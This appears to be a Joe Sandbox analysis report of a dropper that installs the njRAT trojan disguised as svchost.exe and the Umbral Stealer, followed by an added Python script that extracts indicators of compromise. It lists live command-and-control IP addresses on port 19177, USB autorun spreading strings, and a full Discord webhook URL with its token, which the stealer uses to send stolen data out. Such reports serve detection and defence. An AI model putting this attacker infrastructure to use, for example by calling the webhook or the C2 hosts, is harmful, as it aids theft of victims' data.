Source: Binary string: costura.costura.pdb.compressed8 | source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.discordrpc.pdb.compressed | source: ANDYzz-protected.exe.0.dr

              Spreading

Source: svchost.exe.0.dr, Usb1.cs | .Net Code: infect
Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: \autorun.inf
Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: [autorun]
Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: autorun.inf
Source: svchost.exe.0.dr | Binary or memory string: \autorun.inf
Source: svchost.exe.0.dr | Binary or memory string: [autorun]
Source: svchost.exe.0.dr | Binary or memory string: autorun.inf

              Networking

Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49737 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49737 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49740 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49740 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49740 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49740 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49747 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49747 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49749 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49749 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49749 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49749 -> 18.158.249.75:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49750 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49750 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49751 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49751 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49752 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49752 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49753 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49753 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49753 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49753 -> 3.125.209.94:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49754 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49754 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49755 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49755 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49756 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49756 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49757 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49757 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49757 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49757 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49758 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49758 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49758 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49758 -> 3.125.223.134:19177
Source: Traffic | Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49759 -> 3.124.142.205:19177
Source: Traffic | Snort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49759 -> 3.124.142.205:19177
Source: Traffic | Snort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49760 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49760 -> 3.124.142.205:19177
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 3.124.142.205 19177
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 3.125.223.134 19177
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 3.125.209.94 19177
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 18.158.249.75 19177
Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-
Source: Yara match | File source: 3.2.ANDYzz-protected.exe.191dc700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ANDYzz-protected.exe.191d3c91a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 18.158.249.75:19177
Source: global traffic | TCP traffic: 192.168.2.4:49750 -> 3.125.209.94:19177
Source: global traffic | TCP traffic: 192.168.2.4:49754 -> 3.125.223.134:19177
Source: global traffic | TCP traffic: 192.168.2.4:49759 -> 3.124.142.205:19177
Source: global traffic | HTTP traffic detected: POST /api/1.0/ HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: keyauth.win; Content-Length: 376; Expect: 100-continue; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/1.0/ HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: keyauth.win; Content-Length: 162; Expect: 100-continue
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 3.125.223.134
Source: Joe Sandbox View | IP Address: 3.125.209.94
Source: Joe Sandbox View | ASN Name: AMAZON-02US (listed 3 times)
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (listed 6 times)
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: keyauth.win
Source: unknown | HTTP traffic detected: POST /api/1.0/ HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: keyauth.win; Content-Length: 376; Expect: 100-continue; Connection: Keep-Alive
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Umbral.exe, 00000001.00000002.1697775557.00000253800AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gstatic.com
Source: Umbral.exe, 00000001.00000002.1697775557.00000253800F3000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000002.1697775557.0000025380108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: Umbral.exe, 00000001.00000002.1697775557.00000253800F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: Umbral.exe, 00000001.00000002.1699911979.00000253FB552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/tWQFFgygASaEccWKmNiVdEXnTMYHruQoFGGxlHMVsnlabuZvwozniMWOZDMT
Source: Umbral.exe, 00000001.00000002.1697775557.000002538008E000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Umbral.exe.0.dr | String found in binary or memory: https://discord.com/api/v10/users/
Source: Umbral.exe, 00000001.00000002.1697775557.0000025380001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | String found in binary or memory: https://discordapp.com/api/v9/users/
Source: Umbral.exe.0.dr | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: Umbral.exe, 00000001.00000002.1697775557.00000253800A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
Source: Umbral.exe, 00000001.00000002.1698819541.00000253F9220000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/
Source: Umbral.exe, 00000001.00000002.1697775557.0000025380001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gunaframework.com/api/licensing.php
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gunaui.com/
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gunaui.com/api/licensing.php
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gunaui.com/pricing
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://keyauth.cc/panel/amine0xp/ANDYxx/
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://keyauth.win
Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://keyauth.win/api/1.0/
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Window created: window name: CLIPBRDWNDCLASS
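The Snort alerts, TCP connections, Network Connect entries and HTTP requests above repeat the same handful of indicators, and the one thing that stays fixed while the njRAT C2 moves across four AWS addresses is the destination port. The following Python is added here as an example; it is not code from Joe Sandbox or from the sample. It parses report lines in the format the page extraction produced (the run-together "TrafficSnort IDS:" and "HTTP/1.1Host:" joins included) into a deduplicated endpoint set, per-SID counts and HTTP host/path pairs, then groups endpoints by port. REPORT_LINES is constructed from lines quoted above and is not a complete copy of the report.

```python
"""Pull network IOCs out of Joe Sandbox report lines.

Added example for this page, not code from Joe Sandbox or from the sample.
REPORT_LINES is constructed from lines quoted in the report, kept in the
run-together form the page extraction produced so the parser has to cope
with "TrafficSnort IDS:" and "HTTP/1.1Host:" style joins."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set, Tuple

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
SNORT = re.compile(
    rf"Snort IDS:\s*(?P<sid>\d+)\s+(?P<msg>.+?)\s+"
    rf"(?P<src>{IP}):(?P<sport>\d+)\s*->\s*(?P<dst>{IP}):(?P<dport>\d+)"
)
TCP = re.compile(rf"TCP traffic:\s*(?P<src>{IP}):(?P<sport>\d+)\s*->\s*(?P<dst>{IP}):(?P<dport>\d+)")
CONNECT = re.compile(rf"Network Connect:\s*(?P<dst>{IP})\s+(?P<dport>\d+)")
REQUEST = re.compile(r"HTTP traffic detected:\s*(?P<method>GET|POST|PUT|HEAD)\s+(?P<path>\S+)\s+HTTP/")
# Host names in the report are lower-case and the header glued after them
# starts upper-case, so a lower-case class stops at "ip-api.comConnection:".
HOST = re.compile(r"Host:\s*(?P<host>[a-z0-9.-]+)")

REPORT_LINES = [  # constructed from the report above; not a complete copy
    "Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49749 -> 18.158.249.75:19177",
    "Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49749 -> 18.158.249.75:19177",
    "Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49750 -> 3.125.209.94:19177",
    "Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49750 -> 3.125.209.94:19177",
    "Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49754 -> 3.125.223.134:19177",
    r"Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.124.142.205 19177",
    "Source: global trafficTCP traffic: 192.168.2.4:49737 -> 18.158.249.75:19177",
    "Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: POST /api/1.0/ HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: keyauth.winContent-Length: 376Expect: 100-continueConnection: Keep-Alive",
    "Source: unknownDNS query: name: ip-api.com",  # carries no IOC pattern; must be ignored
]


@dataclass
class IocSummary:
    endpoints: Set[Tuple[str, int]] = field(default_factory=set)
    sid_counts: Counter = field(default_factory=Counter)
    sid_messages: Dict[str, str] = field(default_factory=dict)
    http_requests: List[Tuple[str, str, str]] = field(default_factory=list)


def parse_iocs(lines: Iterable[str]) -> IocSummary:
    """Collect (ip, port) destinations, Snort SID hits and HTTP requests."""
    summary = IocSummary()
    for line in lines:
        m = SNORT.search(line)
        if m:
            summary.endpoints.add((m["dst"], int(m["dport"])))
            summary.sid_counts[m["sid"]] += 1
            summary.sid_messages.setdefault(m["sid"], m["msg"])
            continue
        m = TCP.search(line) or CONNECT.search(line)
        if m:
            summary.endpoints.add((m["dst"], int(m["dport"])))
            continue
        m = REQUEST.search(line)
        if m:
            host = HOST.search(line)
            summary.http_requests.append((m["method"], host["host"] if host else "", m["path"]))
    return summary


def c2_ports(endpoints: Set[Tuple[str, int]]) -> Dict[int, Set[str]]:
    """Group destinations by port. A fixed port behind several rotating cloud
    IPs is the stable property to alert on, not the individual addresses."""
    by_port: Dict[int, Set[str]] = {}
    for ip, port in endpoints:
        by_port.setdefault(port, set()).add(ip)
    return by_port


if __name__ == "__main__":
    s = parse_iocs(REPORT_LINES)
    for port, ips in c2_ports(s.endpoints).items():
        print(f"port {port}: {sorted(ips)}")
    for sid, n in s.sid_counts.most_common():
        print(f"SID {sid} x{n}: {s.sid_messages[sid]}")
    for method, host, path in s.http_requests:
        print(f"{method} {host}{path}")
```

Running it on the constructed lines yields a single port, 19177, shared by all four C2 addresses, which is the detail a firewall or IDS rule should key on when the addresses are disposable cloud instances.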

              E-Banking Fraud

Source: Yara match | File source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

              System Summary

Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Code function: 0_2_00007FFD9B880A31
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_05CC4298
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_05CC4287
Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Code function: 3_2_00007FFD9B8B0AAD
Source: ANDYzz-protected.exe.0.dr | Static PE information: No import functions for PE file found
Source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameANDYzz.exe. vs KvS2rT08PQ.exe
Source: KvS2rT08PQ.exe, 00000000.00000002.1650647014.000000001B219000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs KvS2rT08PQ.exe
